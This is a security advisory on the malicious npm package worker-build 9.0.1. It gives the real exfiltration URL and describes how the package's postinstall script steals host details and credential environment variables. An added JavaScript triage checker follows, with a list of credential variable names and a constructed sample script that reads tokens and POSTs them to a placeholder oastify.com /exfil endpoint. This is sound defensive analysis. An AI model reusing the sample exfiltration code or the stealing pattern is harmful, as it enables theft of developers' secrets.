Vulnerability
Malicious code in worker-build (npm)
## Source: amazon-inspector (0e11b6161f4fe3c591bddadbf275003eaac33a1478cda408ac51d85230292e6d)

package.json declares `"postinstall": "node main.js"`, so installation of worker-build@9.0.1 unconditionally executes main.js on `npm install`.

main.js collects host identity (os.hostname(), os.userInfo().username, os.homedir(), process.cwd(), process.argv), reads the consumer's package.json, runs `git config --get remote.origin.url`, and iterates a hardcoded list of credential-shaped environment variables (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_SESSION_TOKEN, NPM_TOKEN, GITHUB_TOKEN, GITLAB_TOKEN, API_KEY, SECRET_KEY, PASSWORD, TOKEN, DATABASE_URL, MONGODB_URI, REDIS_URL), capturing the first 50 characters of each populated value.

The collected JSON payload is POSTed in cleartext to `http://jh4wt1kccd0ul174qgmge9n8izozcu0j.oastify.com/exfil` and `/api/exfil`, with an additional DNS lookup against the same host as a side-channel beacon.

The package name mimics legitimate Cloudflare Workers build tooling, positioning the package for dependency-confusion against installers that misresolve an internal name to the public registry.

## Source: ossf-package-analysis (b5005e4bec545b403f3be10160a08d634d34b5d8ab8e76a185a4a5ba34706719)

The OpenSSF Package Analysis project identified 'worker-build' @ 9.0.1 (npm) as malicious. It is considered malicious because:

- The package communicates with a domain associated with malicious activity.
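As an added example (not part of this advisory and not the package's own code), the check below triages an npm package for the pattern described above: an install-time lifecycle hook, a script that reads several credential-shaped environment variables and fingerprints the host, and an outbound call to an out-of-band callback domain. The sample package.json and main.js are constructed to mirror the description rather than the real package contents, and the list of OAST domains is an assumption.

```javascript
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
// Variable names from the advisory; several hits in one file is the signal, not one.
const CREDENTIAL_ENV_NAMES = [
  'AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY', 'AWS_SESSION_TOKEN', 'NPM_TOKEN',
  'GITHUB_TOKEN', 'GITLAB_TOKEN', 'API_KEY', 'SECRET_KEY', 'PASSWORD', 'TOKEN',
  'DATABASE_URL', 'MONGODB_URI', 'REDIS_URL',
];
// Assumed list of out-of-band callback services; the advisory's host is on oastify.com.
const OAST_DOMAINS = ['oastify.com', 'burpcollaborator.net', 'interact.sh'];
const FINGERPRINT_CALLS = ['os.hostname(', 'os.userInfo(', 'os.homedir(', 'process.cwd(', 'remote.origin.url'];

function triagePackage(pkgJsonText, scriptSources) {
  const scripts = JSON.parse(pkgJsonText).scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS.filter((h) => h in scripts)) {
    findings.push(`install-time hook ${hook} runs: ${scripts[hook]}`);
  }
  for (const [file, src] of Object.entries(scriptSources)) {
    // \b keeps TOKEN from also matching inside NPM_TOKEN.
    const envHits = CREDENTIAL_ENV_NAMES.filter((n) => new RegExp(`\\b${n}\\b`).test(src));
    if (envHits.length >= 3) findings.push(`${file} reads ${envHits.length} credential-shaped env vars`);
    const fp = FINGERPRINT_CALLS.filter((c) => src.includes(c));
    if (fp.length >= 2) findings.push(`${file} fingerprints the host (${fp.join(', ')})`);
    for (const url of src.match(/https?:\/\/[^\s'"`)]+/g) || []) {
      const host = new URL(url).hostname;
      const oast = OAST_DOMAINS.some((d) => host === d || host.endsWith(`.${d}`));
      findings.push(`${file} contacts ${host}` +
        (oast ? ' (OAST callback domain)' : '') + (url.startsWith('http:') ? ' over cleartext HTTP' : ''));
    }
  }
  // The combination seen in worker-build: runs at install, reads secrets, sends them out.
  const has = (s) => findings.some((f) => f.includes(s));
  const verdict = has('install-time hook') && has('credential-shaped') && has(' contacts ') ? 'block'
    : findings.length ? 'review' : 'pass';
  return { verdict, findings };
}

// Constructed sample that mirrors the advisory's description; not the real package contents.
const SAMPLE_PKG_JSON = JSON.stringify({ name: 'worker-build', version: '9.0.1', scripts: { postinstall: 'node main.js' } });
const SAMPLE_MAIN_JS = `
const os = require('os'), http = require('http');
const keys = ['AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY', 'NPM_TOKEN', 'GITHUB_TOKEN'];
const data = { host: os.hostname(), user: os.userInfo().username, cwd: process.cwd(), env: {} };
for (const k of keys) if (process.env[k]) data.env[k] = process.env[k].slice(0, 50);
http.request('http://PLACEHOLDER-ID.oastify.com/exfil', { method: 'POST' }).end(JSON.stringify(data));
`;
function triageSample() {
  return triagePackage(SAMPLE_PKG_JSON, { 'main.js': SAMPLE_MAIN_JS });
}
```

Run `triageSample()` against the constructed sample to get a `block` verdict with four findings; in practice the same function is fed the unpacked tarball of a candidate dependency before it is allowed to install.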
No CVSS base score from NVD or GHSA yet, and no EPSS score has been published for this record yet.
No exploitation, limited impact or prevalence